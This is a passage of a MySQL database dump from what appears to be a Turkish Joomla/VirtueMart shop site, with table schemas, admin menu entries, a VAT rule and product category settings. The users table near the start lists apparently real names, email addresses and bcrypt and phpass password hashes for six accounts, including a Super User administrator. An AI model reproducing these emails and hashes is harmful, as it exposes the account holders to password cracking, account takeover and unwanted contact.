  `password` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `block` tinyint NOT NULL DEFAULT '0',
  `sendEmail` tinyint DEFAULT '0',
  `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `activation` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset',
  `resetCount` int NOT NULL DEFAULT '0' COMMENT 'Count of password resets since lastResetTime',
  `otpKey` varchar(1000) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Two factor authentication encrypted keys',
  `otep` varchar(1000) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'One time emergency passwords',
  `requireReset` tinyint NOT NULL DEFAULT '0' COMMENT 'Require user to reset password on next login',
  `authProvider` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Name of used authentication plugin',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_username` (`username`),
  KEY `idx_block` (`block`),
  KEY `email` (`email`),
  KEY `idx_name` (`name`(100))
) ENGINE=MyISAM AUTO_INCREMENT=744 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_users`
--

LOCK TABLES `fz6t4_users` WRITE;
/*!40000 ALTER TABLE `fz6t4_users` DISABLE KEYS */;
INSERT INTO `fz6t4_users` VALUES (676,'Super User','admin','info@3s-technologies.com.tr','$2y$10$nV/ioVpu2goxW7GBuGC0aODUM0PMjTaWdCHcw8XahFoytLexgIuhK',0,1,'2014-08-01 07:21:38','2024-10-07 07:00:54','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0,''),(677,'Ahmet Unlu','DMB','info@dmb-elektronik.com','$P$D9DsbdGaVDiLV.3A682yOlxHJBK1yb1',0,0,'2014-08-07 06:38:53','2014-08-08 07:07:18','','{\"activate\":0,\"language\":\"tr-TR\"}','0000-00-00 00:00:00',0,'','',0,''),(683,'çığır aydınlatma','çığırayduınlatma','info@cigiraydinlatma.com','$P$DCA7tYOQv48IL22Q2tw7qKgQYJS.f6.',1,0,'2015-03-13 11:07:01','0000-00-00 00:00:00','c2f889075f0c111e9b4d27ba8331bdb1','{}','0000-00-00 00:00:00',0,'','',0,''),(42,'OB','OB','info3@dmb-elektronik.com','$2y$10$DJ.q3DQsPjnoiR6unSnS2.uKeRjqCWezpmwE9UBOm4.jtQES2sEzi',0,0,'2017-11-14 21:23:29','0000-00-00 00:00:00','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0,''),(696,'Eartechnic','Eartechnic','pcb@eartechnic.com','$P$DYy90tfdl9fcRne0nW4e0W/rlsHyEX/',0,0,'2016-11-17 10:57:33','2016-11-21 07:37:40','','{\"activate\":0}','0000-00-00 00:00:00',0,'','',0,''),(698,'mesut','mesut54','mesuterbas1@hotmail.com','$P$Dapc2g5Lja7wby0TsUK4HnQSEZorDL.',0,0,'2016-12-12 04:33:32','0000-00-00 00:00:00','','{\"activate\":0}','0000-00-00 00:00:00',0,'','',0,'');
/*!40000 ALTER TABLE `fz6t4_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_utf8_conversion`
--

DROP TABLE IF EXISTS `fz6t4_utf8_conversion`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_utf8_conversion` (
  `converted` tinyint NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_utf8_conversion`
--

LOCK TABLES `fz6t4_utf8_conversion` WRITE;
/*!40000 ALTER TABLE `fz6t4_utf8_conversion` DISABLE KEYS */;
INSERT INTO `fz6t4_utf8_conversion` VALUES (5);
/*!40000 ALTER TABLE `fz6t4_utf8_conversion` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_viewlevels`
--

DROP TABLE IF EXISTS `fz6t4_viewlevels`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_viewlevels` (
  `id` int unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `title` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `ordering` int NOT NULL DEFAULT '0',
  `rules` varchar(5120) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded access control.',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_assetgroup_title_lookup` (`title`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_viewlevels`
--

LOCK TABLES `fz6t4_viewlevels` WRITE;
/*!40000 ALTER TABLE `fz6t4_viewlevels` DISABLE KEYS */;
INSERT INTO `fz6t4_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',1,'[6,2,8]'),(3,'Special',2,'[6,3,8]'),(4,'Customer Access Level (Example)',3,'[6,3,12]');
/*!40000 ALTER TABLE `fz6t4_viewlevels` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_adminmenuentries`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_adminmenuentries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_adminmenuentries` (
  `id` tinyint unsigned NOT NULL AUTO_INCREMENT,
  `module_id` tinyint unsigned NOT NULL DEFAULT '0' COMMENT 'THE ID OF THE VM MODULE, THIS ITEM IS ASSIGNED TO',
  `parent_id` tinyint unsigned NOT NULL DEFAULT '0',
  `name` char(64) NOT NULL DEFAULT '0',
  `link` char(64) NOT NULL DEFAULT '0',
  `depends` char(64) NOT NULL DEFAULT '' COMMENT 'Names of the Parameters, this Item depends on',
  `icon_class` char(96) DEFAULT NULL,
  `uikit_icon` char(96) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `tooltip` char(128) DEFAULT NULL,
  `view` char(32) DEFAULT NULL,
  `task` char(32) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `module_id` (`module_id`),
  KEY `published` (`published`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=31 DEFAULT CHARSET=utf8mb3 COMMENT='Administration Menu Items';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_adminmenuentries`
--

LOCK TABLES `fz6t4_virtuemart_adminmenuentries` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_adminmenuentries` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_adminmenuentries` VALUES (1,1,0,'COM_VIRTUEMART_CATEGORY_S','','','vmicon vmicon-16-folder_camera','category',1,1,'','category',''),(2,1,0,'COM_VIRTUEMART_PRODUCT_S','','','vmicon vmicon-16-camera','product',2,1,'','product',''),(3,1,0,'COM_VIRTUEMART_PRODUCT_CUSTOM_FIELD_S','','','vmicon vmicon-16-document_move','customfield',5,1,'','custom',''),(4,1,0,'COM_VIRTUEMART_PRODUCT_INVENTORY','','','vmicon vmicon-16-price_watch','inventory',7,1,'','inventory',''),(5,1,0,'COM_VIRTUEMART_CALC_S','','','vmicon vmicon-16-calculator','calculator',8,1,'','calc',''),(6,1,0,'COM_VIRTUEMART_REVIEW_RATE_S','','','vmicon vmicon-16-comments','comments',9,1,'','ratings',''),(7,2,0,'COM_VIRTUEMART_ORDER_S','','','vmicon vmicon-16-page_white_stack','cart',1,1,'','orders',''),(8,2,0,'COM_VIRTUEMART_COUPON_S','','','vmicon vmicon-16-shopping','gift-box',10,1,'','coupon',''),(9,2,0,'COM_VIRTUEMART_REPORT','','','vmicon vmicon-16-chart_bar','revenue',3,1,'','report',''),(10,2,0,'COM_VIRTUEMART_USER_S','','','vmicon vmicon-16-user','user',4,1,'','user',''),(11,2,0,'COM_VIRTUEMART_SHOPPERGROUP_S','','','vmicon vmicon-16-user-group','users',5,1,'','shoppergroup',''),(12,3,0,'COM_VIRTUEMART_MANUFACTURER_S','','','vmicon vmicon-16-wrench_orange','manufacturer',1,1,'','manufacturer',''),(13,3,0,'COM_VIRTUEMART_MANUFACTURER_CATEGORY_S','','','vmicon vmicon-16-folder_wrench','category',2,1,'','manufacturercategories',''),(14,4,0,'COM_VIRTUEMART_STORE','','','vmicon vmicon-16-reseller_account_template','shop',1,1,'','user','editshop'),(15,4,0,'COM_VIRTUEMART_MEDIA_S','','','vmicon vmicon-16-pictures','image',2,1,'','media',''),(16,4,0,'COM_VIRTUEMART_SHIPMENTMETHOD_S','','','vmicon vmicon-16-lorry','shipment',3,1,'','shipmentmethod',''),(17,4,0,'COM_VIRTUEMART_PAYMENTMETHOD_S','','','vmicon vmicon-16-creditcards','credit-card',4,1,'','paymentmethod',''),(18,5,0,'COM_VIRTUEMART_CONFIGURATION','','','vmicon vmicon-16-config','cog',1,1,'','config',''),(19,5,0,'COM_VIRTUEMART_USERFIELD_S','','','vmicon vmicon-16-participation_rate','id-card',2,1,'','userfields',''),(20,5,0,'COM_VIRTUEMART_ORDERSTATUS_S','','','vmicon vmicon-16-document_editing','future',3,1,'','orderstatus',''),(21,5,0,'COM_VIRTUEMART_CURRENCY_S','','','vmicon vmicon-16-coins','currencies',5,1,'','currency',''),(22,5,0,'COM_VIRTUEMART_COUNTRY_S','','','vmicon vmicon-16-globe','world',6,1,'','country',''),(23,11,0,'COM_VIRTUEMART_MIGRATION_UPDATE','','','vmicon vmicon-16-installer_box','lifesaver',0,1,'','updatesmigration',''),(24,11,0,'COM_VIRTUEMART_ABOUT','','','vmicon vmicon-16-info','lifesaver',10,1,'','about',''),(25,11,0,'COM_VIRTUEMART_HELP_TOPICS','http://docs.virtuemart.net/','','vmicon vmicon-16-help','lifesaver',5,1,'','',''),(26,11,0,'COM_VIRTUEMART_COMMUNITY_FORUM','http://forum.virtuemart.net/','','vmicon vmicon-16-reseller_programm','lifesaver',7,1,'','',''),(27,11,0,'COM_VIRTUEMART_STATISTIC_SUMMARY','','','vmicon vmicon-16-info','lifesaver',1,1,'','virtuemart',''),(28,77,0,'COM_VIRTUEMART_USER_GROUP_S','','','vmicon vmicon-16-user',NULL,2,1,'','usergroups',''),(29,11,0,'COM_VIRTUEMART_LOG','','','vmicon vmicon-16-info','lifesaver',2,1,'','log',''),(30,11,0,'COM_VIRTUEMART_SUPPORT','','','vmicon vmicon-16-help','lifesaver',3,1,'','support','');
/*!40000 ALTER TABLE `fz6t4_virtuemart_adminmenuentries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_calc_categories`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_calc_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_calc_categories` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_category_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_category_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_calc_categories`
--

LOCK TABLES `fz6t4_virtuemart_calc_categories` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_calc_countries`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_calc_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_calc_countries` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_country_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_country_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_calc_countries`
--

LOCK TABLES `fz6t4_virtuemart_calc_countries` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_calc_manufacturers`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_calc_manufacturers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_calc_manufacturers` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_manufacturer_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_manufacturer_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_calc_manufacturers`
--

LOCK TABLES `fz6t4_virtuemart_calc_manufacturers` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_manufacturers` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_manufacturers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_calc_shoppergroups`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_calc_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_calc_shoppergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_calc_shoppergroups`
--

LOCK TABLES `fz6t4_virtuemart_calc_shoppergroups` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_calc_states`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_calc_states`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_calc_states` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_state_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_calc_id` (`virtuemart_calc_id`,`virtuemart_state_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_calc_states`
--

LOCK TABLES `fz6t4_virtuemart_calc_states` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_states` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calc_states` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_calcs`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_calcs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_calcs` (
  `virtuemart_calc_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1' COMMENT 'BELONGS TO VENDOR',
  `calc_jplugin_id` int NOT NULL DEFAULT '0',
  `calc_name` varchar(64) NOT NULL DEFAULT '' COMMENT 'NAME OF THE RULE',
  `calc_descr` varchar(128) NOT NULL DEFAULT '' COMMENT 'DESCRIPTION',
  `calc_kind` varchar(16) NOT NULL DEFAULT '' COMMENT 'DISCOUNT/TAX/MARGIN/COMMISSION',
  `calc_value_mathop` varchar(8) NOT NULL DEFAULT '' COMMENT 'THE MATHEMATICAL OPERATION LIKE (+,-,+%,-%)',
  `calc_value` decimal(10,4) NOT NULL DEFAULT '0.0000' COMMENT 'The Amount',
  `calc_currency` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Currency of the Rule',
  `calc_shopper_published` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Visible for Shoppers',
  `calc_vendor_published` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Visible for Vendors',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Startdate if nothing is set = permanent',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Enddate if nothing is set = permanent',
  `for_override` tinyint(1) NOT NULL DEFAULT '0',
  `has_categories` tinyint(1) DEFAULT NULL,
  `has_shoppergroups` tinyint(1) DEFAULT NULL,
  `has_manufacturers` tinyint(1) DEFAULT NULL,
  `has_countries` tinyint(1) DEFAULT NULL,
  `has_states` tinyint(1) DEFAULT NULL,
  `calc_params` varchar(15359) NOT NULL DEFAULT '',
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_calc_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `published` (`published`),
  KEY `calc_kind` (`calc_kind`),
  KEY `shared` (`shared`),
  KEY `publish_up` (`publish_up`),
  KEY `publish_down` (`publish_down`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_calcs`
--

LOCK TABLES `fz6t4_virtuemart_calcs` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_calcs` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_calcs` VALUES (1,1,0,'KDV_18','','VatTax','+%',18.0000,144,0,0,'2014-08-07 07:34:47','0000-00-00 00:00:00',0,0,0,0,0,0,'',0,0,1,'2014-08-07 07:34:47',676,'2014-08-07 07:34:47',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_calcs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_carts`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_carts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_carts` (
  `virtuemart_cart_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_user_id` int unsigned NOT NULL,
  `virtuemart_vendor_id` int unsigned NOT NULL,
  `cartData` varbinary(50000) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_cart_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `virtuemart_user_id` (`virtuemart_user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Used to store the cart';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_carts`
--

LOCK TABLES `fz6t4_virtuemart_carts` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_carts` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_carts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_categories`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_categories` (
  `virtuemart_category_id` int unsigned NOT NULL AUTO_INCREMENT,
  `category_parent_id` int unsigned DEFAULT NULL,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1' COMMENT 'BELONGS TO VENDOR',
  `category_template` varchar(128) DEFAULT NULL,
  `category_layout` varchar(64) DEFAULT NULL,
  `category_product_layout` varchar(64) DEFAULT NULL,
  `products_per_row` varchar(1) NOT NULL DEFAULT '',
  `limit_list_step` varchar(32) DEFAULT NULL,
  `limit_list_initial` smallint unsigned DEFAULT NULL,
  `hits` int unsigned NOT NULL DEFAULT '0',
  `cat_params` varchar(15359) NOT NULL DEFAULT '',
  `metarobot` varchar(40) NOT NULL DEFAULT '',
  `metaauthor` varchar(64) NOT NULL DEFAULT '',
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `has_children` tinyint(1) DEFAULT NULL,
  `has_medias` tinyint(1) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_category_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `published` (`published`),
  KEY `shared` (`shared`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=21 DEFAULT CHARSET=utf8mb3 COMMENT='Product Categories are stored here';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_categories`
--

LOCK TABLES `fz6t4_virtuemart_categories` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_categories` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_categories` VALUES (2,0,1,'','default','default','1','0',0,0,'show_store_desc=\"\"|showcategory_desc=\"\"|showcategory=\"\"|categories_per_row=\"\"|showproducts=\"\"|omitLoaded=\"\"|showsearch=\"\"|productsublayout=\"\"|featured=\"\"|featured_rows=\"\"|omitLoaded_featured=\"\"|discontinued=\"\"|discontinued_rows=\"\"|omitLoaded_discontinued=\"\"|latest=\"\"|latest_rows=\"\"|omitLoaded_latest=\"\"|topten=\"\"|topten_rows=\"\"|omitLoaded_topten=\"\"|recent=\"\"|recent_rows=\"\"|omitLoaded_recent=\"\"|','','',5,0,1,0,1,'2014-08-01 09:02:45',676,'2022-07-26 11:56:12',676,'0000-00-00 00:00:00',0),(3,0,1,'','default','default','1','0',0,0,'show_store_desc=\"\"|showcategory_desc=\"\"|showcategory=\"\"|categories_per_row=\"\"|showproducts=\"\"|omitLoaded=\"\"|showsearch=\"\"|productsublayout=\"\"|featured=\"\"|featured_rows=\"\"|omitLoaded_featured=\"\"|discontinued=\"\"|discontinued_rows=\"\"|omitLoaded_discontinued=\"\"|latest=\"\"|latest_rows=\"\"|omitLoaded_latest=\"\"|topten=\"\"|topten_rows=\"\"|omitLoaded_topten=\"\"|recent=\"\"|recent_rows=\"\"|omitLoaded_recent=\"\"|','','',4,0,0,0,1,'2014-08-01 09:04:13',676,'2020-02-11 14:07:40',676,'0000-00-00 00:00:00',0),(4,0,1,'','default','default','1','0',0,0,'show_store_desc=\"\"|showcategory_desc=\"\"|showcategory=\"\"|categories_per_row=\"\"|showproducts=\"\"|omitLoaded=\"\"|showsearch=\"\"|productsublayout=\"\"|featured=\"\"|featured_rows=\"\"|omitLoaded_featured=\"\"|discontinued=\"\"|discontinued_rows=\"\"|omitLoaded_discontinued=\"\"|latest=\"\"|latest_rows=\"\"|omitLoaded_latest=\"\"|topten=\"\"|topten_rows=\"\"|omitLoaded_topten=\"\"|recent=\"\"|recent_rows=\"\"|omitLoaded_recent=\"\"|','','',3,0,0,0,1,'2014-08-02 06:38:50',676,'2020-11-21 22:48:17',676,'0000-00-00 00:00:00',0),(5,0,1,'0','default','default','1','0',0,0,'','','',6,0,1,0,1,'2014-08-02 07:46:40',676,'2016-12-08 14:46:12',676,'0000-00-00 00:00:00',0),(6,0,1,'0','default','default','1','0',0,0,'','','',7,0,1,0,1,'2014-08-02 07:47:58',676,'2016-12-08 14:44:17',676,'0000-00-00 00:00:00',0),(7,0,1,'0','default','default','1','0',0,0,'','','',1,0,0,0,1,'2014-08-02 07:50:16',676,'2016-12-08 15:32:09',676,'0000-00-00 00:00:00',0),(8,0,1,'','default','default','1','0',0,0,'show_store_desc=\"\"|showcategory_desc=\"\"|showcategory=\"\"|categories_per_row=\"\"|showproducts=\"\"|omitLoaded=\"\"|showsearch=\"\"|productsublayout=\"\"|featured=\"\"|featured_rows=\"\"|omitLoaded_featured=\"\"|discontinued=\"\"|discontinued_rows=\"\"|omitLoaded_discontinued=\"\"|latest=\"\"|latest_rows=\"\"|omitLoaded_latest=\"\"|topten=\"\"|topten_rows=\"\"|omitLoaded_topten=\"\"|recent=\"\"|recent_rows=\"\"|omitLoaded_recent=\"\"|','','',8,0,1,0,1,'2014-08-02 07:52:35',676,'2020-11-21 22:49:30',676,'0000-00-00 00:00:00',0),(9,0,1,'0','default','default','1','0',0,0,'','','',9,0,1,0,1,'2014-08-02 07:58:27',676,'2016-12-08 14:54:14',676,'0000-00-00 00:00:00',0),(10,0,1,'0','default','default','1','0',0,0,'','','',10,0,0,0,1,'2014-08-02 09:19:38',676,'2016-12-08 14:43:52',676,'0000-00-00 00:00:00',0),(11,0,1,'0','default','default','1','0',0,0,'','','',11,0,1,0,1,'2014-08-02 09:21:12',676,'2016-12-08 14:53:40',676,'0000-00-00 00:00:00',0),(12,0,1,'0','default','default','2','0',0,0,'','','',13,0,0,1,1,'2014-08-02 09:35:53',676,'2016-12-08 14:52:56',676,'0000-00-00 00:00:00',0),(13,0,1,'0','default','default','1','0',0,0,'','','',12,0,1,0,1,'2014-08-02 09:41:05',676,'2016-12-08 14:54:48',676,'0000-00-00 00:00:00',0),(14,12,1,'0','default','default','2','0',0,0,'','','',1,0,1,0,1,'2014-08-03 10:50:44',676,'2014-08-03 10:51:02',676,'0000-00-00 00:00:00',0),(15,12,1,'0','default','default','2','0',0,0,'','','',1,0,1,0,1,'2014-08-03 10:52:42',676,'2014-08-03 10:52:56',676,'0000-00-00 00:00:00',0),(16,12,1,'0','default','default','0','0',0,0,'','','',2,0,1,0,1,'2014-08-03 10:54:37',676,'2014-08-03 10:54:59',676,'0000-00-00 00:00:00',0),(17,12,1,'0','default','default','2','0',0,0,'','','',3,0,1,0,1,'2014-08-03 10:55:51',676,'2014-08-03 11:55:34',676,'0000-00-00 00:00:00',0),(18,0,1,'','default','default','1','0',0,0,'show_store_desc=\"\"|showcategory_desc=\"\"|showcategory=\"\"|categories_per_row=\"\"|showproducts=\"\"|omitLoaded=\"\"|showsearch=\"\"|productsublayout=\"\"|featured=\"\"|featured_rows=\"\"|omitLoaded_featured=\"\"|discontinued=\"\"|discontinued_rows=\"\"|omitLoaded_discontinued=\"\"|latest=\"\"|latest_rows=\"\"|omitLoaded_latest=\"\"|topten=\"\"|topten_rows=\"\"|omitLoaded_topten=\"\"|recent=\"\"|recent_rows=\"\"|omitLoaded_recent=\"\"|','','',1,0,1,0,1,'2019-09-16 08:34:27',676,'2019-09-16 10:28:19',676,'0000-00-00 